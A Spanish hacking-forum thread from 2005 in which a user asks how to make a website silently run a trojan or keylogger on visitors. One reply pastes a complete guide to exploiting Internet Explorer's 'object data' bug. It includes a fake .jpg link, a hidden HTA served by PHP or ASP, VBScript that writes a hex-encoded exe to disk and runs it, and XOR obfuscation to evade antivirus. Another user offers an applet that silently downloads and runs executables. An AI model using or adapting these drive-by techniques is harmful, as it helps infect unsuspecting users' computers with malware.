elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderadores: zhyzura, toxeek)
| | | |-+  Ejecutarse un exe automáticamente al entrar en una web
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ejecutarse un exe automáticamente al entrar en una web  (Leído 8,619 veces)
-sagitari-


Desconectado Desconectado

Mensajes: 1.639


:D


Ver Perfil WWW
Ejecutarse un exe automáticamente al entrar en una web
« en: 14 Septiembre 2005, 21:22 »

Bueno, amigos...

Sé que esta pregunta es novatísima y todo eso, quiero saber la manera que SIRVA que sea entrar en una weby que al entrar se ejecute un exe (troyano, keylogger...) sin que la víctima se dé cuenta.

He probado de falsear el entorno con javascript pero no sabéis bien lo que varia según el S.O, la resolución, el navegador... en fin... tambié he probado mediante el object data, pero tampoco nada, decidme formas porfavor, QUE SEAN EFICACES.

Gracias...
[/sub]
En línea

programatrix


Desconectado Desconectado

Mensajes: 3.284


Ver Perfil WWW
Re: Ejecutarse un exe automáticamente al entrar en una web
« Respuesta #1 en: 14 Septiembre 2005, 21:35 »

Bug object data.
Este documento está sacado de la mitosis de gedzac. Te aconsejo que busques en internet es muy facil de usarle. Pero ahora los navegadores están parcheados.
Citar
Tema          : Bug del Object Data
Autor         : MachineDramon
Válido para   : vbs o js en IE 5.5 - 6.0

La etiqueta <object> en html se puede usar para colocar animaciones
flash, video, sonido, imagenes, activex etc en una pagina web.

El bug reside en la propiedad data de la etiqueta, si por ejemplo
colocamos:

<object data="miexe.exe"></object>

IE no activara el exe porque es una extensión no segura. Pero
si le pasamos una extensión segura como php o asp y se le envia
al navegador una cabecera http indicando que el archivo es un hta
el archivo es ejecutado como hta (HTML Application) por el mshta.exe
con todos los permisos.

<object data="miphp.php"></object>

Teoricamente debe funcionar en IE 5.x y 6.x y todos los win de 98 a Xp

Habran notado que cuando usamos <object> para el bug aparece un
pequeño cuadradito en la page, si se quiere evitar pongan:

<object style="display:none" data="miphp.php"></object>

aunque para cuando el user vea el cuadradito si es que lo ve, ya
sera muy tarde.

Ahora como hacerlo:
--------------------
La demostracion esta orientada al irc, a que el usuario haga click en un
vinculo del tipo:  http://www.miserver.com/cuenta/foto.jpg y se le ejecute
el hta, y tambien vea la foto.

1)Conseguir un server, de preferencia gratuito que soporte php o asp
luego abrimos una cuenta con algun nombre, creamos dentro de nuestra
cuenta una carpeta "foto.jpg" cosa que nuestra url quede
http://www.miserver.com/cuenta/foto.jpg/ ,esto es importante
para el engaño, ya que al ver el vinculo
http://www.miserver.com/cuenta/foto.jpg
pensara que es una foto (jpg), cuando en realidad es un directorio
/foto.jpg/ y como los servers siempre muestran el index dentro del
directorio entonces lo que vera sera /foto.jpg/index.htm

2)Hacemos un index.htm mas o menos asi:
el 1° frame carga el htm que acciona el bug, y el otro carga la imagen
ha mostrar

-----------------------------------------------------------
<frameset rows="1%,99%" frameborder=0 framespacing=0>
<frame src="bug.htm" scrolling="no" noresize>
<frame src="image.htm">
</frame>
-----------------------------------------------------------

3)El archivo image.htm debe tener el html que muestre la imagen:
<image src="image.jpg">

4)el archivo bug.htm debe tener el html que llame al archivo bug.php
para originar el bug

Originalmente bastaria con colocar:
<object style="display:none" data=bug.php>

pero microsoft saco un parche que impedia hacerlo de esa forma, pero
fiel a la costumbre el parche tambien tenia errores si se insertaba
de forma dinamica el html funcionaba el bug:
Se usa innerHTML para insertar html en forma dinamica, aunque no es
la unica forma.

---------------------------------------------------------
<Script Language='VBScript'>
On Error Resume Next
id = setTimeout("showWCP2()", 5000)

Sub showWCP2()
document.body.innerHTML = "<object style="&Chr(34)&"display:none"&Chr(34)&" data=bug.php>"
End Sub
</Script>
---------------------------------------------------------

Luego se saco un segundo parche que si corregia esto.

Y esto para los users paranoicos que se desabilitan la secuencia de
comandos activex, las 2 anteriores funcionan con los activex activados
pero sigo prefiriendo la 2 forma. Elijan

---------------------------------------------------------
<html>
<span datasrc="#oData" datafld="bData" dataformatas="html"></span>
<xml id="oData">
  <gedzac>
    <bData>
      <![CDATA[
      <object id="oIRC" style="display:none" data="bug.php"></object>
      ]]>
    </bData>
  </gedzac>
</xml>
</html>
---------------------------------------------------------

5)Ahora hacemos el php o asp:
---------------------------------------------------------------------------
Creamos un archivo txt y escribimos lo siguiente y lo renombramos a php

->code php para enviar la cabecera que indique que se habra como un hta
->(Thx a Falckon por enseñarme esta parte del php)
<?php
header("Content-type: application/hta");
?>

Ó creamos un archivo txt y escribimos lo siguiente y lo renombramos a asp

->code asp para enviar la cabecera que indique que se habra como un hta
<%
Response.AddHeader "Content-type", "application/hta"
%>

->de aqui en adelante con asp o php igual
->Luego ponemos esto para que no se vea la ventana del hta al ejecutarse
<html>
<HTA:APPLICATION ID="G" APPLICATIONNAME="G" BORDER="none" BORDERSTYLE="normal" CAPTION="no" ICON="" CONTEXTMENU="no" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no" SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" WINDOWSTATE="minimize"/>

->Aqui va el script que se quiere que se ejecute, en vbs o js
<Script Language='VBScript'>

==========Script==============

->Esto para cerrar el hta
window.close()
</Script>
</html>
-----------------------------------------------------------------------------

  a)En el Script podemos usar el wscript.shell, el scripting.filesystemobject
o cualquier objeto ActiveX

Si queremos ejecutar un exe en la pc, debemos pasarlo a hexadecimal primero
colocamos este code en visual basic, para pasar el exe a hexadecimal

-------------------------------------------------------
Open "c:\mi_exe.exe" For Binary As #1
Open "c:\mi_exe.txt" For Output As #2
A$ = " "
While Not EOF(1)
Get #1, , A$
B$ = Hex$(Asc(A$))
If Len(B$) = 1 Then B$ = "0" + B$
Print #2, B$;
Wend
Close
-------------------------------------------------------

Lo que nos de en mi_exe.txt lo ponemos en el script a ejecutar de esta forma:

--------------------------------------------------------------------------
<Script Language='VBScript'>
'Resumidor de errores y objetos fso y ws
On Error Resume Next
Set WS = CreateObject("WScript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")

'var con el code hexa del exe
HExeFile="4D5A90000300000.......code.hexa......0000000000000000000000000000"

'luego de 1 segundo llama al sub ExecFile
id = setTimeout("ExecFile()", 1000)

'Sub que escribe y ejecuta al exe
Sub ExecFile()
Set db = FSO.CreateTextFile("C:\TestG.exe")
db.Write Dcd(HExeFile)
db.Close

WS.Run "C:\TestG.exe": document.write "Error 2045"

->Esto para cerrar el hta despues de ejecutar el exe
window.close()
End Sub

'funcion que pasa el code hexa a binario para escribirlo en el exe
Function Dcd(HT)
For i = 1 To Len(HT) Step 2
tb = Chr(37+1) & Chr(72) & Mid(HT, i, 2): tt = tt & Chr(tb)
Next
Dcd = tt
End Function
</Script>
--------------------------------------------------------------------------

Nota: Es posible que si la pc usa firewall o antivirus que implementan
scriptbloking como mcafee o norton, no funcione el bug.
Para mayor eficacia se recomienda cifrar el exploit con alguna funcion
Ejem:
----------------------------------------------------------------------
Function q(j)
On Error Resume Next
For R = 1 To Len(j): q = q & Chr(Asc(Mid(j, R, 1)) Xor 7): Next
End Function
----------------------------------------------------------------------

Referencias: http://www.cyruxnet.com.ar/object_data.htm

Saludos  ;)
P.D si no puedes con object data no vas a poder hacerlo de otra manera porque no han salido mas tipo de bug que hagan esto (según creo)
En línea

pisagatos


Desconectado Desconectado

Mensajes: 1.772



Ver Perfil WWW
Re: Ejecutarse un exe automáticamente al entrar en una web
« Respuesta #2 en: 14 Septiembre 2005, 21:46 »

Eso solo sirve para IE, no?? Para Mozilla, Netscape, Camino, o cualquiero otro no srive, no??
En línea

-sagitari-


Desconectado Desconectado

Mensajes: 1.639


:D


Ver Perfil WWW
Re: Ejecutarse un exe automáticamente al entrar en una web
« Respuesta #3 en: 14 Septiembre 2005, 22:04 »

pero object data probe y como q no..... seguro q no hay otro bug?

cuando salen popups y t descargan mierdas, d alguna manera lo hacen, no?

gracias x la info
En línea

programatrix


Desconectado Desconectado

Mensajes: 3.284


Ver Perfil WWW
Re: Ejecutarse un exe automáticamente al entrar en una web
« Respuesta #4 en: 14 Septiembre 2005, 23:08 »

Ahora todo el mundo usa el service pack 2 y es muy dificil metérselo.
 :o
En línea

_R€d_


Desconectado Desconectado

Mensajes: 1.350



Ver Perfil WWW
Re: Ejecutarse un exe automáticamente al entrar en una web
« Respuesta #5 en: 15 Septiembre 2005, 03:47 »

Pues...miren esto: 8=

Mas facil no se que hay... ;)
En línea

pisagatos


Desconectado Desconectado

Mensajes: 1.772



Ver Perfil WWW
Re: Ejecutarse un exe automáticamente al entrar en una web
« Respuesta #6 en: 15 Septiembre 2005, 12:00 »

8= ------  ()-:

Mejor, este, le mea en la boca,,, agg... q asco!!
En línea

_R€d_


Desconectado Desconectado

Mensajes: 1.350



Ver Perfil WWW
Re: Ejecutarse un exe automáticamente al entrar en una web
« Respuesta #7 en: 15 Septiembre 2005, 15:25 »

:s :s :s :s :s :s

:D
En línea

-sagitari-


Desconectado Desconectado

Mensajes: 1.639


:D


Ver Perfil WWW
Re: Ejecutarse un exe automáticamente al entrar en una web
« Respuesta #8 en: 15 Septiembre 2005, 17:56 »

8= ------  ()-:

Mejor, este, le mea en la boca,,, agg... q asco!!

q guarrillo
¬¬
En línea

Yshua

Desconectado Desconectado

Mensajes: 51


Yeshúa Ha Mashiaj... Mikamoha belim Adonai


Ver Perfil WWW
Re: Ejecutarse un exe automáticamente al entrar en una web
« Respuesta #9 en: 28 Julio 2007, 17:18 »

Eh leido las reglas del foro, y se que decia q posts inactivos por más de 3 semanas no contestarlos, entonces q estoy haciendo, pues creo q esta vez es útil, entre a este post, desde el recopilatorio de posts interesantes, y solo contesto por q se de un método y se los quiero compartir, en si se trata de un applet que eh hecho yo, hace esto, das un link que tenga el applet, al applet le haz pasado previamente un parámetro con un link del ejecutable, y cuando entran, sin q el user se de cuenta, se descarga el ejecutable y se abre.
perdon si es Spam pero acá les dejo un par de links donde ya se habló de esto.
oo perdon acabo de ver y parece q se ha perdido uno de los links...

http://www.ale666.com/Foro/index.php?topic=2214.0
ese es uno pero no es el q tiene el applet igual algo se explica, si es útil pues luego amplio más este post, y les doy el applet y la forma de configurarlo.
En línea


Baruj aba beshem Adonai.
<a href="http://www.cp666group.com">visita mi sitio CP666GROUP</a>
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines